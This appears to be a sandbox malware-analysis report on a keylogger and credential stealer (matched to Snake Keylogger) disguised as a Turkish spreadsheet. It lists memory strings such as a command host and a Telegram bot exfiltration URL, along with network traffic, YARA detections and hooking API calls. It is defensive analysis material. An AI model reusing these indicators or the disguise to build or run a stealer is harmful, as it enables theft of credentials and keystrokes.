                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4490630405.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20a
                    Source: InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 00000007.00000002.4495336578.0000000002F54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 00000007.00000002.4495336578.0000000002E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003391000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.00000000027FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: InstallUtil.exe, 00000007.00000002.4495336578.0000000002F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002C6E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49778 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49811 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49853 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to capture screen (.Net source)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B14E50 NtProtectVirtualMemory,0_2_05B14E50
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B16388 NtResumeThread,0_2_05B16388
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B14E48 NtProtectVirtualMemory,0_2_05B14E48
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B16380 NtResumeThread,0_2_05B16380
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B44E50 NtProtectVirtualMemory,3_2_05B44E50
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B46388 NtResumeThread,3_2_05B46388
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B44E48 NtProtectVirtualMemory,3_2_05B44E48
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B46380 NtResumeThread,3_2_05B46380
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05224E50 NtProtectVirtualMemory,6_2_05224E50
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05226388 NtResumeThread,6_2_05226388
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05224E48 NtProtectVirtualMemory,6_2_05224E48
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05226380 NtResumeThread,6_2_05226380
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B66E5B0_2_05B66E5B
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_03111BA80_2_03111BA8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_031169780_2_03116978
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_0311C8F80_2_0311C8F8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_03116E080_2_03116E08
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_031153F80_2_031153F8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_031169680_2_03116968
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_03118F5D0_2_03118F5D
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_03118F600_2_03118F60
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_03114E180_2_03114E18
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_031185300_2_03118530
